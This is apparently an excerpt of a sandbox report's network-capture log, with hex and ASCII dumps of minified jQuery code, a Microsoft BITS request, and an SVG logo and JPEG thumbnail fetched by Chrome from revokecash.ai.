                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                          2023-12-10 16:44:16 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.54972323.204.76.112443
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:17 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2023-12-10 16:44:17 UTC495INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 70 69 56 65 72 73 69 6f 6e 3a 20 44 69 73 74 72 69 62 75 74 65 20 31 2e 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 6e 66 69 67 2e 6a 73 6f 6e 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 63 6f 6e 66 69 67 2e 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 54 61 67 3a 20 22 30 78 36 34 36 36 37 46 37 30 37 46 46 30 37 44 36 32 42 37 33 33 44 42 43 42 37 39 45 46 45 33 38 35 35 45 36 38 38 36 43 39 39 37 35 42 30 43 30 42 34 36 37 44 34 36 32 33 31 42 33 46 41 35 45 37 22 0d 0a 4c 61 73 74 2d 4d 6f 64 69
                                                                          Data Ascii: HTTP/1.1 200 OKApiVersion: Distribute 1.1Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.jsonContent-Type: application/octet-streamETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"Last-Modi


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.549724172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:17 UTC352OUTGET /_img/revoke.svg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:17 UTC718INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 31 34 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 31 30 32 65 2d 31 38 63 35 33 33 32 35 62 37
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:17 GMTContent-Type: image/svg+xmlContent-Length: 4142Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"102e-18c53325b7
                                                                          2023-12-10 16:44:17 UTC651INData Raw: 3c 73 76 67 20 68 65 69 67 68 74 3d 22 34 34 35 2e 30 34 35 34 34 6d 6d 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 31 38 2e 37 35 33 30 33 20 34 34 2e 35 30 34 35 34 34 22 20 77 69 64 74 68 3d 22 32 31 38 37 2e 35 33 30 33 6d 6d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 67 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 2e 32 36 34 35 38 33 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 36 32 2e 36 33 33 35 32 20 2d 35 33 2e 36 30 33 30 37 39 29 22 3e 3c 70 61 74 68 20 64 3d 22 6d 31 33 32 2e 33 35 36 38 31 20 39 35 2e 30 30 36 39 35 2d 35 2e 31 38 31 36 2d 31 35 2e 39 35 31 31 39 39 63 34 2e 33 36 38 38 2d 31 2e 36 32 35 36 20 36 2e 37 35 36 34 2d 35 2e 33
                                                                          Data Ascii: <svg height="445.04544mm" viewBox="0 0 218.75303 44.504544" width="2187.5303mm" xmlns="http://www.w3.org/2000/svg"><g stroke-width=".264583" transform="translate(-62.63352 -53.603079)"><path d="m132.35681 95.00695-5.1816-15.951199c4.3688-1.6256 6.7564-5.3
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: 6c 2e 38 36 33 36 2d 35 2e 33 33 34 68 38 2e 38 39 6c 31 2e 34 32 32 34 2d 39 2e 30 34 32 34 68 2d 31 39 2e 32 35 33 32 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 37 37 2e 33 34 33 33 39 20 39 35 2e 30 30 36 39 35 20 31 36 2e 34 35 39 32 2d 33 38 2e 33 30 33 31 39 39 68 2d 31 31 2e 32 32 36 38 6c 2d 35 2e 33 33 34 20 31 35 2e 37 34 38 63 2d 31 2e 30 31 36 20 33 2e 30 39 38 38 2d 31 2e 36 37 36 34 20 36 2e 31 34 36 38 2d 32 2e 36 34 31 36 20 39 2e 32 34 35 36 68 2d 2e 31 30 31 36 63 2e 31 30 31 36 2d 33 2e 30 39 38 38 2e 33 35 35 36 2d 36 2e 31 34 36 38 2e 33 35 35 36 2d 39 2e 32 34 35 36 6c 2e 30 35 30 38 2d 31 35 2e 37 34 38 68 2d 31 30 2e 38 37 31 32 6c 32 2e 37 34 33 32 20 33 38 2e 33 30 33 31 39 39 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 39 32
                                                                          Data Ascii: l.8636-5.334h8.89l1.4224-9.0424h-19.2532z"/><path d="m177.34339 95.00695 16.4592-38.303199h-11.2268l-5.334 15.748c-1.016 3.0988-1.6764 6.1468-2.6416 9.2456h-.1016c.1016-3.0988.3556-6.1468.3556-9.2456l.0508-15.748h-10.8712l2.7432 38.303199z"/><path d="m192
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: 38 32 35 20 35 38 2e 30 32 33 39 39 39 36 20 31 36 39 2e 33 34 20 31 32 35 2e 37 31 34 30 30 33 36 20 32 32 35 2e 37 35 33 20 32 37 2e 34 31 39 20 32 32 2e 38 35 31 20 35 37 2e 30 36 34 20 34 32 2e 35 32 36 20 38 39 20 35 38 2e 34 39 34 20 31 30 2e 36 31 31 20 35 2e 33 30 35 20 32 34 2e 36 32 33 20 31 34 2e 38 37 31 20 33 37 20 31 32 2e 32 33 35 20 31 30 2e 33 33 2d 32 2e 32 20 32 30 2e 36 31 37 2d 38 2e 35 34 33 20 33 30 2d 31 33 2e 32 33 35 20 32 32 2e 33 35 31 2d 31 31 2e 31 37 37 20 34 33 2e 39 39 36 2d 32 34 2e 33 39 35 20 36 34 2d 33 39 2e 33 37 34 20 37 33 2e 36 31 38 2d 35 35 2e 31 32 33 20 31 32 39 2e 30 36 2d 31 33 33 2e 33 30 32 20 31 34 35 2e 35 37 36 2d 32 32 34 2e 38 37 33 20 36 2e 37 35 36 2d 33 37 2e 34 36 31 20 35 2e 34 32 34 2d 37 35 2e
                                                                          Data Ascii: 825 58.0239996 169.34 125.7140036 225.753 27.419 22.851 57.064 42.526 89 58.494 10.611 5.305 24.623 14.871 37 12.235 10.33-2.2 20.617-8.543 30-13.235 22.351-11.177 43.996-24.395 64-39.374 73.618-55.123 129.06-133.302 145.576-224.873 6.756-37.461 5.424-75.
                                                                          2023-12-10 16:44:17 UTC753INData Raw: 31 31 30 2e 37 39 35 36 39 38 63 30 20 32 39 2e 33 30 34 34 37 2d 2e 38 35 38 36 37 20 35 38 2e 31 32 36 31 39 20 34 2e 35 36 31 34 32 20 38 37 2e 30 35 33 37 36 20 31 39 2e 31 32 36 31 31 20 31 30 32 2e 30 37 36 34 38 20 39 38 2e 35 39 30 33 36 34 20 31 38 36 2e 36 39 37 36 38 20 31 39 33 2e 32 38 38 30 34 34 20 32 32 35 2e 35 34 38 33 39 76 2d 34 35 39 2e 39 39 39 39 39 38 63 2d 36 2e 39 31 32 38 36 20 32 2e 35 31 35 36 36 2d 31 33 2e 32 31 35 33 35 20 36 2e 36 33 37 38 35 2d 31 39 2e 37 38 34 39 34 20 39 2e 39 32 33 31 34 2d 31 31 2e 30 37 31 36 36 20 35 2e 35 33 35 38 33 2d 32 32 2e 38 37 35 33 36 20 31 30 2e 35 34 30 34 33 2d 33 34 2e 36 32 33 36 36 20 31 34 2e 34 35 36 38 36 2d 33 33 2e 39 35 35 39 31 20 31 31 2e 33 32 30 39 35 2d 37 30 2e 39 38 39
                                                                          Data Ascii: 110.795698c0 29.30447-.85867 58.12619 4.56142 87.05376 19.12611 102.07648 98.590364 186.69768 193.288044 225.54839v-459.999998c-6.91286 2.51566-13.21535 6.63785-19.78494 9.92314-11.07166 5.53583-22.87536 10.54043-34.62366 14.45686-33.95591 11.32095-70.989


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.549725172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:17 UTC356OUTGET /_img/demo-thumb.jpg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:17 UTC718INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 30 39 39 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 31 38 61 38 35 2d 31 38 63 35 33 33 32 35 39 65
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:17 GMTContent-Type: image/jpegContent-Length: 100997Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:37 GMTETag: W/"18a85-18c533259e
                                                                          2023-12-10 16:44:17 UTC651INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c2 00 11 08 02 d0 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 05 06 04 07 08 0a 09 ff da 00 08 01 01 00 00 00 00 fc d7 02 66 66 52 4c 89 94 13 24 93 31 32 48 4c 92 04 aa 4c a5 29 13 29 26 62 52 4c a4 90 09 9a a6 2a 24 94 a6 44 a5 24
                                                                          Data Ascii: JFIFHH"ffRL$12HLL))&bRL*$D$
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: 92 e2 72 2f eb 19 2d 67 9c d6 70 7b 7e a0 00 00 00 00 00 00 00 00 00 00 00 00 39 fc 0a b3 35 57 54 d6 91 d7 a9 4a 20 8d d2 90 2e 64 d4 d2 00 00 2d e3 20 00 00 00 00 00 00 00 00 00 9b 80 00 4c 81 48 aa aa ab ae 6b 99 27 ae c9 4c 42 23 b3 39 d5 63 5c ee 0f 27 b4 3a e7 09 86 d9 74 ec be 23 31 18 9e 7f 26 2e 58 c5 00 00 00 00 00 00 00 00 00 00 6c 57 75 86 c5 8c cf 67 f2 5a 75 8e c8 eb ec c7 6f 74 4e c5 dc 9d 4d 98 f5 f7 4c f9 2b 84 73 ad 5f ca ec 3a f5 58 a9 ae ba aa 99 99 9e bb 91 34 55 11 47 66 f6 95 ae b0 e5 6d ba 46 e5 d8 3d 2d 84 e5 6f 5d 43 ed dd 07 75 e3 da d5 ba 86 bc ae a5 a9 00 00 00 00 00 00 00 00 00 00 77 af 3f cf 7d 95 b5 f4 6e d5 dd db b7 96 f8 7e b1 f2 d7 68 7e 93 7e 4a f6 0f a3 7a 2b b1 fd 63 d7 3e 15 ee 0b 9b 57 5e ef 1e 32 ce f6 0f 5e d5 88
                                                                          Data Ascii: r/-gp{~95WTJ .d- LHk'LB#9c\':t#1&.XlWugZuotNML+s_:X4UGfmF=-o]Cuw?}n~h~~Jz+c>W^2^
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: 00 00 00 00 00 2c fc e4 5e bd 7a e5 75 57 32 eb b9 4d 31 4c 45 34 7d 32 de 00 00 00 01 f9 fb 88 ed 6f 61 eb fd 03 e9 e1 d2 fe 4b ec cf 68 07 9c 3b 8f 6c 79 3b a3 bd d7 bb 87 5c 6f 3c e2 3c 89 eb c3 4f f1 d7 b7 3c bf ea 3f 2c fa f0 0f 1c 7a 9f ce 7d 93 47 73 6a de 7a e6 fa 85 a9 5d da 00 00 00 00 01 67 e7 26 ed eb d5 dc aa b9 97 5e c9 4a 88 a6 28 fa 64 bc 00 00 00 03 ae bf 1e bf 43 3c cd e9 cf 2d 76 b6 fb d0 ff 00 a2 1e 4f c0 f9 27 f4 f3 c4 fe b9 e9 0d 47 1d e8 d7 6d fe 68 7e 92 f9 3f 3f d7 5e 9e f3 6e 7b c9 7e c4 eb ae ec e8 4f 6a fe 73 fe ce fe 70 e3 ea eb 4f d7 9f c7 7d e3 b3 ba a3 d6 3d 5b e8 7e 82 ea 3f d1 3f ca 6f 61 fe 7c 7a 6b 78 ea df 4b f8 f3 3f d9 bc 3d 57 8d fa aa 00 00 00 00 0b 3f 39 77 2f 5f ae ba ea aa 5d 77 32 a5 4d 34 c5 bf a6 4b c0 00 00
                                                                          Data Ascii: ,^zuW2M1LE4}2oaKh;ly;\o<<O<?,z}Gsjz]g&^J(dC<-vO'Gmh~??^n{~OjspO}=[~??oa|zkxK?=W?9w/_]w2M4K
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: 76 a9 ad 3d 77 25 33 4c 5b a2 cf d2 f5 e0 00 00 00 31 38 bd 9c 00 1e 3c d3 f0 be 99 ef 43 4f fc e3 df f9 3c 9c 77 60 51 ec f0 00 d2 3c 09 b5 e4 b9 58 5c 85 cd 0b 66 e6 e9 bb d7 a4 bb 84 30 5e 43 d3 b7 5d 7f 0f c2 9a 75 2f d3 6c a8 00 00 00 16 7e 74 b9 17 ae 5d be ae 65 d7 82 26 9a 6d d1 6b e9 76 f0 00 00 00 18 9c 5e ce 00 0e 37 58 ef 99 2e 49 66 cd ab 96 d5 b9 c0 01 67 57 e3 6d 09 b5 7f 4f da 6f 5a ab 99 70 23 16 e5 71 75 fd 92 29 d6 f6 6c a8 00 00 00 16 7e 74 ef de bb 76 f4 d5 51 d7 80 a6 9a 6d da fa 5c bc 00 00 00 06 27 aa 76 69 98 5d 90 16 f8 d4 72 e4 01 15 00 02 84 d1 17 6c 57 5b 8f c8 00 11 32 d7 3b 47 2a 00 00 00 05 9f 9d 3e 45 db d7 ae 4d 73 33 d7 40 a6 9a 28 b7 f4 b7 78 00 00 00 0c 4f 8b 33 18 8d a7 52 e6 7a cb 66 ba 07 95 b5 8a f9 7e 92 dc 18 4e
                                                                          Data Ascii: v=w%3L[18<CO<w`Q<X\f0^C]u/l~t]e&mkv^7X.IfgWmOoZp#qu)l~tvQm\'vi]rlW[2;G*>EMs3@(xO3Rzf~N
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: a6 f0 00 eb 6f 39 70 b6 0c 1f ae 36 70 00 c1 f9 67 63 ab 91 ab db c8 76 0e b1 e8 5c a8 00 00 00 16 7e 77 af f2 2e 5d bb 5d c2 7a f2 a2 9a 62 9b 76 a8 fa 50 bc 00 00 00 06 27 5f d9 d1 20 12 a2 62 66 92 64 22 24 02 44 4c 4c 40 00 2a 24 35 8d 83 2a 00 00 00 05 9f 9d eb fc 8b d7 6e 5c aa 66 7a ee 4a 62 28 a6 c5 3f 49 f7 80 00 00 00 c4 e2 f6 70 00 6a 98 83 78 e5 30 7a ed c9 46 6f 3e 00 00 89 00 02 25 04 55 ac 65 72 a0 00 00 00 59 f9 df bf c8 bb 7a e5 75 cc ba ee 48 8a 69 a2 cd 3f 49 d7 80 00 00 00 c4 e2 f6 70 00 8f 03 f5 06 33 79 f7 07 69 3a f7 8f d6 7d 99 d9 4e ba ea 9c 1e 1f b3 b6 2e b7 df fa df d6 00 d2 fa 7e 78 da a6 dd 5e d1 dd c0 05 3e 66 e7 70 ef 69 19 5b 9d b3 d7 5e 8b ca 80 00 00 01 67 e7 7e ff 00 22 ed eb 95 d7 32 eb c5 4a 62 9a 68 b3 47 d2 75 e0 00
                                                                          Data Ascii: o9p6pgcv\~w.]]zbvP'_ bfd"$DLL@*$5*n\fzJb(?Ipjx0zFo>%UerYzuHi?Ip3yi:}N.~x^>fpi[^g~"2JbhGu
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: 4a a6 ba aa bd 72 e5 cb d7 6b ae aa eb 95 69 eb b1 29 a6 29 88 88 b7 4d 31 4a 00 4c c5 40 99 12 90 92 53 15 24 99 02 52 04 ca 42 64 09 4c 84 a5 21 29 99 89 90 05 44 84 cc cc d7 55 ca eb bb 72 ed 55 d7 55 55 4a b4 f5 cc a6 48 85 2a 61 4c 45 28 a6 a9 13 22 42 64 90 4a 42 49 91 32 02 66 64 54 09 4a 52 91 24 a4 04 a4 4c 92 48 a8 99 25 25 4a a6 aa ab ae e5 75 d5 5d 53 72 66 52 eb a2 64 98 82 21 42 60 12 02 66 40 99 4a 52 25 52 52 48 2a 09 94 81 52 50 99 25 29 4a 45 51 32 92 42 64 2a 04 a4 94 ca 66 6a ae aa a6 aa aa aa 6e 55 29 1d 77 24 93 28 4c 10 92 52 09 4a 52 95 44 a4 48 49 32 4c 55 22 53 24 cc 49 24 d4 26 42 49 48 91 32 4a 64 4a 49 4a 52 12 99 99 91 54 aa 9a a6 6a aa 40 ff c4 00 1b 01 01 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 01 02 05 06 07 03 04
                                                                          Data Ascii: Jrki))M1JL@S$RBdL!)DUrUUUJH*aLE("BdJBI2fdTJR$LH%%Ju]SrfRd!B`f@JR%RRH*RP%)JEQ2Bd*fjnU)w$(LRJRDHI2LU"S$I$&BIH2JdJIJRTj@
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: b8 f1 73 80 00 00 00 00 00 00 00 00 01 b2 dd f8 b9 f0 00 00 00 00 00 00 00 00 00 d9 6d 3c 7a 50 00 00 00 00 00 00 00 00 00 dc ef 7c 3c b8 00 00 00 00 00 00 00 00 00 7a f6 3e 5d 68 00 00 00 00 00 00 00 00 00 73 dc f7 b7 b5 00 00 00 00 00 00 00 00 00 0f 9f 9b ed f7 00 00 00 00 00 00 00 00 00 0e 73 92 da 77 80 00 25 00 00 00 00 00 00 00 18 fc 7e 9f 40 00 00 00 00 00 00 00 00 00 e7 79 6d 9f 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff c4 00 36 10 00 01 04 01 03 01 06 06 01 04 02 03 01 01 01 00 02 00 01 03 04 12 05 11 14 13 06 15 16 21 31 50 10 22 23 30 33 40 34 20 24 32 35 41 70 36 42 60 90 25 43 ff da 00 08 01 01 00 01 08 03 ff 00 f4 ad 85 bf e7 68 d6 d1 ad a3
                                                                          Data Ascii: sm<zP|<z>]hssw%~@ymp6!1P"#03@4 $25Ap6B`%Ch
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: e4 a8 ff 00 23 d9 1c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 05 82 c1 60 b0 58 2c 16 0b 04 c3 b7 df 8f b4 17 63 0c 55 89 a4 b7 26 72 e0 b0 58 2c 16 0b 04 cd b7 ed b5 1a db 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb 83 59 70 